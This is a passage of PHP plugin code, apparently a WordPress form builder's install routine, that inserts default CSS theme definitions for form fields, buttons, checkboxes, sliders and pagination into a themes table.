0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #5C00DA;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #3D0886;\r\n}.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #5C00DA;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png)  top left #3D0886;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #5C00DA;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E3E2E4;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #5C00DA;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\nfloat:left;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #FFF;\r\n	cursor: pointer;\r\n	background-color: #5C00DA;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #5C00DA ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #5C00DA ), color-stop(49%, #5C00DB ), color-stop(84%, #6600F0 ), color-stop(99%, #7917FF )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #D9D7D8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #fff;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 02 transparent (aquamarine button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #EAF9F3;\r\nborder: 1px solid #4D4A58;\r\nmargin-bottom: 10px;\r\ncolor: #4D4A58;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #94FFD5;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right  #E4F3E2;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #94FFD5;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left  #E4F3E2;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #94FFD5;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/02/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: 